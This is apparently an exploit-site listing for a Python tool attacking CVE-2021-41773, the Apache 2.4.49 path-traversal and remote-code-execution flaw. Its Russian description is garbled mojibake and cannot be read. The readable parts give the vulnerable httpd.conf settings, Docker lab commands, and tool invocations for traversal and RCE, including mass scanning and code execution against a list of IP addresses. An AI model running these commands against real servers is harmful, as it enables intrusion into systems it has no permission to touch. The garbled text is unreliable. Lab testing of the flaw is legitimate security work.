## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-WALNUTSECURITY-CVE-2021-41773
# Apache 2.4.49 - ΠΠ±Ρ
ΠΎΠ΄ ΠΊΠ°ΡΠ°Π»ΠΎΠ³Π° ΠΈΠ»ΠΈ ΡΠ΄Π°Π»Π΅Π½Π½ΠΎΠ΅ Π²ΡΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅ ΠΊΠΎΠ΄Π°
cve-2021-41773.py β ΡΡΠΎ ΡΠΊΡΠΈΠΏΡ Π½Π° Python, ΠΊΠΎΡΠΎΡΡΠΉ ΠΏΠΎΠΌΠΎΠ³Π°Π΅Ρ ΠΎΠ±Π½Π°ΡΡΠΆΠΈΡΡ ΡΡΠ·Π²ΠΈΠΌΠΎΡΡΡ ΠΎΠ±Ρ
ΠΎΠ΄Π° ΠΊΠ°ΡΠ°Π»ΠΎΠ³Π° ΠΈΠ»ΠΈ ΡΠ΄Π°Π»Π΅Π½Π½ΠΎΠ³ΠΎ Π²ΡΠΏΠΎΠ»Π½Π΅Π½ΠΈΡ ΠΊΠΎΠ΄Π° Π² Apache 2.4.49. ΠΡΠ΅Π΄ΠΎΡΡΠ°Π²Π»Π΅Π½ ΡΡΠ·Π²ΠΈΠΌΡΠΉ ΡΠΊΠ·Π΅ΠΌΠΏΠ»ΡΡ Docker, ΡΡΠΎΠ±Ρ ΠΌΠΎΠΆΠ½ΠΎ Π±ΡΠ»ΠΎ ΠΎΠΏΡΠΎΠ±ΠΎΠ²Π°ΡΡ CVE-2021-41773
ΠΡΠ»ΠΈ Π²ΠΊΠ»ΡΡΠ΅Π½ CGI-BIN, ΡΠΎ ΠΌΠΎΠΆΠ½ΠΎ Π²ΡΠΏΠΎΠ»Π½ΠΈΡΡ ΡΠ΄Π°Π»Π΅Π½Π½ΠΎΠ΅ Π²ΡΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅ ΠΊΠΎΠ΄Π°, Π½ΠΎ Π½Π΅ ΠΎΠ±Ρ
ΠΎΠ΄ ΠΊΠ°ΡΠ°Π»ΠΎΠ³Π°, ΠΏΠΎΡΡΠΎΠΌΡ ΠΊΠ°ΡΠ°Π»ΠΎΠ³ "icons" Π±ΡΠ» Π΄ΠΎΠ±Π°Π²Π»Π΅Π½ Π² ΡΠ°Π·Π΄Π΅Π» Alias Π² httpd.conf Π΄Π»Ρ ΠΏΡΠΎΠ²Π΅ΡΠΊΠΈ ΡΡΠ·Π²ΠΈΠΌΠΎΡΡΠΈ ΠΎΠ±Ρ
ΠΎΠ΄Π° ΠΊΠ°ΡΠ°Π»ΠΎΠ³Π°.
# Π£ΡΠ·Π²ΠΈΠΌΡΠ΅ ΠΊΠΎΠ½ΡΠΈΠ³ΡΡΠ°ΡΠΈΠΈ Π² httpd.conf
root@kitploit:~
1. Enable CGI-BIN
2. Add "icons" directory in Alias section
3. <Directory>Require all granted</Directory>
# ΠΠ°Π±ΠΎΡΠ°ΡΠΎΡΠΈΡ Π΄Π»Ρ CVE-2021-41773
### Π‘Π±ΠΎΡΠΊΠ° Docker
root@kitploit:~
$ docker build -t cve-2021-41773 .
### ΠΠ°ΠΏΡΡΠΊ Docker
root@kitploit:~
$ docker run -it cve-2021-41773
# ΠΡΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°Π½ΠΈΠ΅ cve-2021-41773.py
### ΠΡΠΎΠ²Π΅ΡΠΊΠ° Π½Π° ΠΎΠ±Ρ
ΠΎΠ΄ ΠΊΠ°ΡΠ°Π»ΠΎΠ³Π° ΠΈ ΡΠ΄Π°Π»Π΅Π½Π½ΠΎΠ΅ Π²ΡΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅ ΠΊΠΎΠ΄Π°
root@kitploit:~
$ python3 cve-2021-41773.py -u http://172.17.0.2
### PoC ΠΎΠ±Ρ
ΠΎΠ΄Π° ΠΊΠ°ΡΠ°Π»ΠΎΠ³Π°
root@kitploit:~
$ python3 cve-2021-41773.py -u http://172.17.0.2 -pt
### PoC ΡΠ΄Π°Π»Π΅Π½Π½ΠΎΠ³ΠΎ Π²ΡΠΏΠΎΠ»Π½Π΅Π½ΠΈΡ ΠΊΠΎΠ΄Π°
root@kitploit:~
$ python3 cve-2021-41773.py -u http://172.17.0.2 -rce
### ΠΠ»Ρ ΠΌΠ°ΡΡΠΎΠ²ΠΎΠ³ΠΎ ΡΠΊΠ°Π½ΠΈΡΠΎΠ²Π°Π½ΠΈΡ ΡΠΊΠ°ΠΆΠΈΡΠ΅ ΡΠ΅ΠΊΡΡΠΎΠ²ΡΠΉ ΡΠ°ΠΉΠ» Ρ IP-Π°Π΄ΡΠ΅ΡΠ°ΠΌΠΈ:
root@kitploit:~
$ python3 cve-2021-41773.py -l list.txt
root@kitploit:~
$ python3 cve-2021-41773.py -l list.txt -pt
root@kitploit:~
$ python3 cve-2021-41773.py -l list.txt -rce
ΠΠΎΠ»ΡΡΠ΅ ΠΈΠ½ΡΠΎΡΠΌΠ°ΡΠΈΠΈ ΠΌΠΎΠΆΠ½ΠΎ Π½Π°ΠΉΡΠΈ Π·Π΄Π΅ΡΡ.
### ΠΡΡΠΎΡΠ½ΠΈΠΊΠΈ
* https://nvd.nist.gov/vuln/detail/CVE-2021-41773
* https://vulners.com/cve/CVE-2021-41773
* https://httpd.apache.org/security/vulnerabilities_24.html
* https://vulners.com/cve/CVE-2021-41773
* https://walnutsecurity.com/path-traversal-remote-code-execution-in-apache/